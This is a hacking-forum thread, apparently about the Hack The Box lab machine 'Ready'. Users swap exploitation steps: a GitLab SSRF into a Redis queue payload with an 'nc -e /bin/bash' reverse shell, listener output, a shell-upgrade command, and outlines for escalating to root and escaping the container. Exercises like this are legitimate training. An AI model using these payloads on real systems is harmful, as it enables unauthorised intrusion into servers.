Posts
19
Threads
0
Joined
Sep 2020
December 13, 2020 at 11:39 AM
(December 13, 2020 at 01:28 AM)xxxxxd Wrote: (December 13, 2020 at 01:21 AM)Kali76 Wrote: (December 13, 2020 at 01:07 AM)xxxxxd Wrote: you can simply use nc like
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc -e /bin/bash ***IP*** ***PORT*** \').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
exec
Not work ... Response --
HTTP/1.1 422 Unprocessable Entity
Server: nginx
Date: Sun, 13 Dec 2020 00:19:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2936
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
X-Request-Id: 2b9bc018-b0c8-4fb4-860b-80c4ae76afee
X-Runtime: 0.019574
422 Unprocessable Entity, says that your request is not in a correct format.
-> new project -> import project -> repo by url -> some name and this url: git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git -> intercept with burp and edit the request as shown here: https://github.com/jas502n/gitlab-SSRF-r...te-request Can’t replicate this at all for some reason, strange.
Posts
109
Threads
9
Joined
Apr 2020
December 13, 2020 at 12:14 PM
(December 13, 2020 at 11:39 AM)JustMeAndYou Wrote: (December 13, 2020 at 01:28 AM)xxxxxd Wrote: (December 13, 2020 at 01:21 AM)Kali76 Wrote: (December 13, 2020 at 01:07 AM)xxxxxd Wrote: you can simply use nc like
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc -e /bin/bash ***IP*** ***PORT*** \').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
exec
Not work ... Response --
HTTP/1.1 422 Unprocessable Entity
Server: nginx
Date: Sun, 13 Dec 2020 00:19:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2936
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
X-Request-Id: 2b9bc018-b0c8-4fb4-860b-80c4ae76afee
X-Runtime: 0.019574
422 Unprocessable Entity, says that your request is not in a correct format.
-> new project -> import project -> repo by url -> some name and this url: git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git -> intercept with burp and edit the request as shown here: https://github.com/jas502n/gitlab-SSRF-r...te-request Can’t replicate this at all for some reason, strange.
yes neither do I, I am listening on my docker with netcat but I do not get anything, something wrong, REsponse---
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Dec 2020 03:14:16 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, private, must-revalidate, no-store
Etag: W/"566a101f09634a379f862102aebae194"
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Request-Id: be7cf16c-f1f8-4370-928b-f5b849cc4143
X-Runtime: 0.102288
X-Ua-Compatible: IE=edge
X-Xss-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000
Content-Length: 50705
Posts
2
Threads
0
Joined
Dec 2020
December 13, 2020 at 12:17 PM
Don't forget to URL encode it..
Posts
34
Threads
0
Joined
Nov 2020
December 13, 2020 at 12:28 PM
Guys you can do it without burp, search for liveoverflow article, you can send the whole url encoded payload inside the url field and get a shell !!!
https://liveoverflow.com/gitlab-11-4-7-r...-ctf-2018/
Posts
2
Threads
0
Joined
Dec 2020
December 13, 2020 at 12:43 PM
This post was last modified: December 13, 2020 at 12:58 PM by geky0. Edited 1 time in total.
Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole
Posts
109
Threads
9
Joined
Apr 2020
December 13, 2020 at 01:11 PM
This post was last modified: December 13, 2020 at 01:23 PM by Kali76. Edited 1 time in total.
(December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole
Not work /bin/sh
[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls
My payload:
https://pastebin.com/YWWR9Uq9
Posts
64
Threads
3
Joined
Oct 2020
December 13, 2020 at 05:34 PM
1. Gitlab ssrf + redis for foothold
2. Smtp password in /opt/backup/gitlab.rb for root.
3. Break out of the container (mount host fs or use release agent to get what you need)
Posts
101
Threads
17
Joined
Nov 2020
December 13, 2020 at 06:15 PM
This post was last modified: December 13, 2020 at 06:17 PM by 0xvijay. Edited 1 time in total.
(December 13, 2020 at 01:11 PM)Kali76 Wrote: (December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole
Not work /bin/sh
[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls
My payload:
https://pastebin.com/YWWR9Uq9
python3 -c "import pty;pty.spawn('/bin/bash')";
That's all you've done but ls wont work there coz there no files or folders there
try other comands
whoami and more...
lmao u got shell and only tried ls command there xD
Posts
109
Threads
9
Joined
Apr 2020
December 13, 2020 at 07:00 PM
(December 13, 2020 at 06:15 PM)0xvijay Wrote: (December 13, 2020 at 01:11 PM)Kali76 Wrote: (December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole
Not work /bin/sh
[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls
My payload:
https://pastebin.com/YWWR9Uq9
python3 -c "import pty;pty.spawn('/bin/bash')";
That's all you've done but ls wont work there coz there no files or folders there
try other comands
whoami and more...
lmao u got shell and only tried ls command there xD
[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59090.
git
Posts
101
Threads
17
Joined
Nov 2020
December 13, 2020 at 07:05 PM
(December 13, 2020 at 07:00 PM)Kali76 Wrote: (December 13, 2020 at 06:15 PM)0xvijay Wrote: (December 13, 2020 at 01:11 PM)Kali76 Wrote: (December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole
Not work /bin/sh
[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls
My payload:
https://pastebin.com/YWWR9Uq9
python3 -c "import pty;pty.spawn('/bin/bash')";
That's all you've done but ls wont work there coz there no files or folders there
try other comands
whoami and more...
lmao u got shell and only tried ls command there xD
[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59090.
git
python3 -c "import pty;pty.spawn('/bin/bash')";
run this there
Posts
109
Threads
9
Joined
Apr 2020
December 13, 2020 at 07:09 PM
(December 13, 2020 at 07:05 PM)0xvijay Wrote: (December 13, 2020 at 07:00 PM)Kali76 Wrote: (December 13, 2020 at 06:15 PM)0xvijay Wrote: (December 13, 2020 at 01:11 PM)Kali76 Wrote: (December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole
Not work /bin/sh
[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls
My payload:
https://pastebin.com/YWWR9Uq9
python3 -c "import pty;pty.spawn('/bin/bash')";
That's all you've done but ls wont work there coz there no files or folders there
try other comands
whoami and more...
lmao u got shell and only tried ls command there xD
[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59090.
git
python3 -c "import pty;pty.spawn('/bin/bash')";
run this there
not have a shell, how do i launch it?
Posts
101
Threads
17
Joined
Nov 2020
December 13, 2020 at 07:15 PM
This post was last modified: December 13, 2020 at 07:16 PM by 0xvijay.
(December 13, 2020 at 07:09 PM)Kali76 Wrote: (December 13, 2020 at 07:05 PM)0xvijay Wrote: (December 13, 2020 at 07:00 PM)Kali76 Wrote: (December 13, 2020 at 06:15 PM)0xvijay Wrote: (December 13, 2020 at 01:11 PM)Kali76 Wrote: Not work /bin/sh
[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls
My payload:
https://pastebin.com/YWWR9Uq9
python3 -c "import pty;pty.spawn('/bin/bash')";
That's all you've done but ls wont work there coz there no files or folders there
try other comands
whoami and more...
lmao u got shell and only tried ls command there xD
[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59090.
git
python3 -c "import pty;pty.spawn('/bin/bash')";
run this there
not have a shell, how do i launch it?
You can run coz got connected lmao
ok wait I make a detailed writeup for u soon for user + root
|
